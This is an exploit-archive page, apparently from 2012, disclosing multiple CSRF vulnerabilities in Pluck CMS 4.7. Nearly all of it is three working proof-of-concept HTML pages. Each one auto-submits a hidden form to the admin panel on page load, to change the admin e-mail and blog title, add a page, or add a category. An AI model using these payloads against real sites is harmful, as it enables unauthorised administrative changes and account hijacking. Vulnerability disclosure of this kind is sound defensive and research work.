Pluck CMS 4.7 Multiple CSRF Vulnerabilities



EKU-ID: 1464 CVE: OSVDB-ID:
Author: Gordon Security Published: 2012-02-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Pluck cms multiple vulnerabilit�
# Date: 09/01/2012
# Author: Gordon Security
# Vendor or Software Link: www.pluck-cms.org
# Version: 4.7
# Category: webapps
# Website:www.gordon-security.blogspot.com
C.S.R.F. #1
#[p.o.c.] Change admin e-mail and change title blog
<html>
<title>Gordon Security</title>
<body onload="javascript:document.
forms[0].submit()">
<H3>www.gordon-security.blogspot.com</H3>
<H2>CSRF Exploit to change Admin E-mail and Blog Title</H2>
<form method="POST" name="form0" action="
http://127.0.0.1:80/pluck/admin.php?action=settings<http://127.0.0.1/pluck/admin.php?action=settings>
">
<input type="hidden" name="cont1" value="Gordon Security"/>
<input type="hidden" name="cont2" value="gordon_@hotmail.it"/>
<input type="hidden" name="save" value="Salva"/>
</form>
</body>
</html>
C.S.R.F. #2
#[p.o.c.] Add page to blog
<html>
<title>Gordon Security</title>
<body onload="javascript:document.forms[0].submit()">
<H3>www.gordon-security.blogspot.com</H3>
<H2>CSRF Exploit to add page</H2>
<form method="POST" name="form0" action="
http://127.0.0.1:80/pluck/admin.php?action=editpage<http://127.0.0.1/pluck/admin.php?action=editpage>
">
<input type="hidden" name="title" value="Exploit"/>
<input type="hidden" name="content" value="<p>Exploited</p>"/>
<input type="hidden" name="description" value=""/>
<input type="hidden" name="keywords" value=""/>
<input type="hidden" name="hidden" value="no"/>
<input type="hidden" name="sub_page" value=""/>
<input type="hidden" name="theme" value="default"/>
<input type="hidden" name="save_exit" value="Save and Exit"/>
</form>
</body>
</html>
C.S.R.F #3
#[p.o.c.] Add categorie
<html>
<title>Gordon Security</title>
<body onload="javascript:document.forms[0].submit()">
<H3>www.gordon-security.blogspot.com</H3>
<H2>CSRF Exploit to add categorie</H2>
<form method="POST" name="form0" action="
http://127.0.0.1:80/pluck/admin.php?module=blog<http://127.0.0.1/pluck/admin.php?module=blog>
">
<input type="hidden" name="cont1" value="Hacking"/>
<input type="hidden" name="Submit" value="Salva"/>
</form>
</body>
</html>